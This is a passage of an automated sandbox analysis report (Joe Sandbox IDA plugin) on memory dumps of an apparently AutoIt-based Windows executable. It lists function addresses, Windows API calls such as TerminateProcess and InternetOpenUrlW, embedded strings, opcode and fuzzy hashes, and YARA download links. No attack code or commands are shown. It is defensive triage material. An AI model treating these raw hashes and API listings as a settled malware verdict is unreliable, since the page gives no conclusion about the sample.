Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 75bb38b10f0a423a2aa86de6533e5279d074c1744d50cdd991d57bdd203b09b7
Instruction ID: 1f3cd69c3629df789996f9cf4d66712567b9ed2467f615e97d8012acb175a9d4
Opcode Fuzzy Hash: 75bb38b10f0a423a2aa86de6533e5279d074c1744d50cdd991d57bdd203b09b7
Instruction Fuzzy Hash: BF0167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 00C69AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 0576a5800ba69506eabf76e5358ed278e13fbd7cef6e28858cc99b97532930d6
Instruction ID: 65ba05d6a1774e13e9b2b7557838f8a371752aacaeabb7f9bc72d1e437788ee7
Opcode Fuzzy Hash: 0576a5800ba69506eabf76e5358ed278e13fbd7cef6e28858cc99b97532930d6
Instruction Fuzzy Hash: 1C01A436102211ABDB251B94EC88FEF77ADFF89706B040529F503978A1DB749D01EB50

Function 00C67BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C67C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C67C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00C67C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C67C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C67C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C67C4C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b454da921d3ee066ecfe1b49196883ca4b6408c72bb4171c53e00101154e5b2e
Instruction ID: 097ce81d2f38555f0d25d8db7db657f73bea6cf0e2c93a6e1c4ca38eeb952f9a
Opcode Fuzzy Hash: b454da921d3ee066ecfe1b49196883ca4b6408c72bb4171c53e00101154e5b2e
Instruction Fuzzy Hash: 6BF01772242158BBE7215B529C0EFEF7B7CEBC7B19F040418FA0392461D7A05A41C6B5

Function 00C69A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C69A33
EnterCriticalSection.KERNEL32(?,?,?,?,00C95DEE,?,?,?,?,?,00C2ED63), ref: 00C69A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00C95DEE,?,?,?,?,?,00C2ED63), ref: 00C69A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00C95DEE,?,?,?,?,?,00C2ED63), ref: 00C69A5E

Part of subcall function 00C693D1: CloseHandle.KERNEL32(?,?,00C69A6B,?,?,?,00C95DEE,?,?,?,?,?,00C2ED63), ref: 00C693DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C69A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00C95DEE,?,?,?,?,?,00C2ED63), ref: 00C69A78

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 0c4de4a9eceaeef965c2bb0ccffe20bc5079ed33022316f42a4748e789ef2189
Instruction ID: be28a8c3bec62791b6e7dd522d5af0161db88d7eeed932a8dfd5ac5db9dc615e
Opcode Fuzzy Hash: 0c4de4a9eceaeef965c2bb0ccffe20bc5079ed33022316f42a4748e789ef2189
Instruction Fuzzy Hash: 5BF0E276141201ABD7211BA4EC8CFEF3779FF86306B040125F103968B1CB789D00EB50

Function 00C21CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00C3F4EA: std::exception::exception.LIBCMT ref: 00C3F51E
Part of subcall function 00C3F4EA: __CxxThrowException@8.LIBCMT ref: 00C3F533

__swprintf.LIBCMT ref: 00C21EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C21D49

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 8d0dfcae6295c8a01fb641a8e90ce6d85aaab0136cc8d4eb4154560d31d0d5c9
Instruction ID: db103717f2a1e876ab5a4ea1d5260f8e87706b277b0953cf62a9cfccf34a090d
Opcode Fuzzy Hash: 8d0dfcae6295c8a01fb641a8e90ce6d85aaab0136cc8d4eb4154560d31d0d5c9
Instruction Fuzzy Hash: 04916D71504221AFCB24EF24D899C6EB7A4FF95700F05491DF896976A1DB30EE04EB92

Function 00C7AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C7B006
CharUpperBuffW.USER32(?,?), ref: 00C7B115
VariantClear.OLEAUT32(?), ref: 00C7B298

Part of subcall function 00C69DC5: VariantInit.OLEAUT32(00000000), ref: 00C69E05
Part of subcall function 00C69DC5: VariantCopy.OLEAUT32(?,?), ref: 00C69E0E
Part of subcall function 00C69DC5: VariantClear.OLEAUT32(?), ref: 00C69E1A

Strings

AUTOIT.ERROR, xrefs: 00C7B11B
Incorrect Parameter format, xrefs: 00C7B03E, 00C7B20B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 623cad001205ed715a9ea35badb4bb4a45cfc846a505fc5e783bc02f67c7a367
Instruction ID: c983b854af3d5158cf8286024b56fffd21f2c3cb69d630e0c4cb27d52788d096
Opcode Fuzzy Hash: 623cad001205ed715a9ea35badb4bb4a45cfc846a505fc5e783bc02f67c7a367
Instruction Fuzzy Hash: 509169746083019FCB10DF24D495A9EBBE4EF89704F04886EF89A9B362DB31ED45DB52

Function 00C65347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C6F4: _wcscpy.LIBCMT ref: 00C3C717

_memset.LIBCMT ref: 00C65438
GetMenuItemInfoW.USER32(?), ref: 00C65467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C65513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C6553D

Strings

0, xrefs: 00C65430

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 87d09ff0df92f791ced6cf3eae01a77080cb0861bf14ebafc1b72ec3af528976
Instruction ID: 6748d8fc93f7fc6a181e159e8471fcdedd586c62e7d1c317f7f683c2cd2e8322
Opcode Fuzzy Hash: 87d09ff0df92f791ced6cf3eae01a77080cb0861bf14ebafc1b72ec3af528976
Instruction Fuzzy Hash: A751F3716047019BD7249B28C8C577FB7E8AF85750F24062AF8A6D31A0DB70CE44D752

Function 00C60213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C602B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C602C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C60344

Strings

DllGetClassObject, xrefs: 00C602B7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 130a8e87e49e02f552fb8d731adcedd6ddcdf5354982d5b70a9858f39ffd1056
Instruction ID: adbf526ceb6648a076b70883e47ee1359412425166817d5d96008619713a9966
Opcode Fuzzy Hash: 130a8e87e49e02f552fb8d731adcedd6ddcdf5354982d5b70a9858f39ffd1056
Instruction Fuzzy Hash: F6416FB16002049FDB25CF54C8C4BAB7BB9EF45315B2480A9E90AAF216D7B1DA44CBA0

Function 00C65007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C65075
GetMenuItemInfoW.USER32 ref: 00C65091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00C650D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CE1708,00000000), ref: 00C65120

Strings

0, xrefs: 00C6506D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 2ef3c2605a3950c28d479abcce6b79dd4057387bd1ddeac4d5672474e95c69c7
Instruction ID: 22c484fe2f18a2578b043d8f370c1b2be49ec4010adbb765bf08b0a1883a13ed
Opcode Fuzzy Hash: 2ef3c2605a3950c28d479abcce6b79dd4057387bd1ddeac4d5672474e95c69c7
Instruction Fuzzy Hash: 7941A071204701AFD730DF24D8C5B6EB7E4AF8A324F244A5EF9A697291D730E904DB62

Function 00C80567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00C80587

Strings

none, xrefs: 00C80662
stdcall, xrefs: 00C80609
cdecl, xrefs: 00C805DE
winapi, xrefs: 00C805F8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 4fd544479269fd1fd87949bf894b7c38a33c9a56af6794bd187ddca2775ae451
Instruction ID: 84992a1209485acfccad7e1407f81296f7927306eb87c0c9d34a0e2905f73d2c
Opcode Fuzzy Hash: 4fd544479269fd1fd87949bf894b7c38a33c9a56af6794bd187ddca2775ae451
Instruction Fuzzy Hash: 6E317E70500226AFCF00EF54D9819EEB3B4FF55314F108A2AF836A76D1EB71A915CB90

Function 00C5B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C5B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C5B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C5B8D1

Strings

ListBox, xrefs: 00C5B84D
ComboBox, xrefs: 00C5B815

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 90ccc0316001a0965e1395aea3048f9fe01f602c185235496883e1b8f5181e06
Instruction ID: 180f2906b269b97420194ef20b263bb0e722bf8c135b4c4cd22bec800d355b32
Opcode Fuzzy Hash: 90ccc0316001a0965e1395aea3048f9fe01f602c185235496883e1b8f5181e06
Instruction Fuzzy Hash: B4213579900208BFDB04ABA4D886EFE7B7CDF05315F104129F826A71E0DB740E4AA724

Function 00C743E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C74401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C74427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C74457
InternetCloseHandle.WININET(00000000), ref: 00C7449E

Part of subcall function 00C75052: GetLastError.KERNEL32(?,?,00C743CC,00000000,00000000,00000001), ref: 00C75067

Strings

, xrefs: 00C74450

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: b17753c1ece97a99bf743fbe037c260e05227fa649a8143d37c4d0a033ef0552
Instruction ID: 35694f352a891fac975da6b02f88722c748f504f2ec2ffa6565c82eb2e403157
Opcode Fuzzy Hash: b17753c1ece97a99bf743fbe037c260e05227fa649a8143d37c4d0a033ef0552
Instruction Fuzzy Hash: 2F217FB1500208BEE7159B658C85FBFBAECEB49758F10C01AF50AD2140DB748E05A770

Function 00C890E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C3D1BA
Part of subcall function 00C3D17C: GetStockObject.GDI32(00000011), ref: 00C3D1CE
Part of subcall function 00C3D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C8915C
LoadLibraryW.KERNEL32(?), ref: 00C89163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C89178
DestroyWindow.USER32(?), ref: 00C89180

Strings

SysAnimate32, xrefs: 00C89137

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 97aa8492d432014ba8bb26b9bafe83e29a5f736adde7d6e7fcd5782955099f80
Instruction ID: bee77872c71e29da1c750e1b8c601cea83f2b19edfecb338677d8c0f3e9c0a73
Opcode Fuzzy Hash: 97aa8492d432014ba8bb26b9bafe83e29a5f736adde7d6e7fcd5782955099f80
Instruction Fuzzy Hash: 1121CF71214206BBEF106E64DC88FFE37ADEF99368F180618F922A3190C731CC41A764

Function 00C69568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C69588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C695B9
GetStdHandle.KERNEL32(0000000C), ref: 00C695CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C69605

Strings

nul, xrefs: 00C69600

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 73a6b0c2a8b7838b6a38b5d017210dee07de0ca4f9f033957df61dae5daa41e8
Instruction ID: 00a7d943eae8b7555894f01187315b8d4a7594d9114d56d2d6e2747bb3f040a9
Opcode Fuzzy Hash: 73a6b0c2a8b7838b6a38b5d017210dee07de0ca4f9f033957df61dae5daa41e8
Instruction Fuzzy Hash: 17214C70600205ABDB319F29DC85B9EBBE8EF85724F204B19F9A2D72E0D770DA45DB10

Function 00C69634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C69653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C69683
GetStdHandle.KERNEL32(000000F6), ref: 00C69694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C696CE

Strings

nul, xrefs: 00C696C9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 20d82a79d5b24ff9bca6ee928080a18c3dfdff465665aaa7430b56da0764bcd1
Instruction ID: 33f89e20b027c6c956d6894ef8df468a067103cc950d83766ed6a0bf935e8e42
Opcode Fuzzy Hash: 20d82a79d5b24ff9bca6ee928080a18c3dfdff465665aaa7430b56da0764bcd1
Instruction Fuzzy Hash: CE2169716003059BDB209F69DC84F9EB7ACEF45724F200A19F8B2E32E0EA70D941CB11

Function 00C6DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C6DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C6DB5E
__swprintf.LIBCMT ref: 00C6DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,00CBDC00), ref: 00C6DBB5

Strings

%lu, xrefs: 00C6DB71

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1adbdd792e00fa1967165d8524d2dbfe28e7d2caacb75893f5b86ca13e4541db
Instruction ID: b36ecd7b7ebee9ece93fc1017cfccc3071d4d0cb536020c9320eaa3c888333cd
Opcode Fuzzy Hash: 1adbdd792e00fa1967165d8524d2dbfe28e7d2caacb75893f5b86ca13e4541db
Instruction Fuzzy Hash: B9219535A00108AFCB10EFA5DD85EEEBBB8EF89704F004069F506D7251DB70EA41DB61

Function 00C5C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C5C84A
Part of subcall function 00C5C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5C85D
Part of subcall function 00C5C82D: GetCurrentThreadId.KERNEL32 ref: 00C5C864
Part of subcall function 00C5C82D: AttachThreadInput.USER32(00000000), ref: 00C5C86B

GetFocus.USER32 ref: 00C5CA05

Part of subcall function 00C5C876: GetParent.USER32(?), ref: 00C5C884

GetClassNameW.USER32(?,?,00000100), ref: 00C5CA4E
EnumChildWindows.USER32(?,00C5CAC4), ref: 00C5CA76
__swprintf.LIBCMT ref: 00C5CA90

Strings

%s%d, xrefs: 00C5CA8A

Memory Dump Source

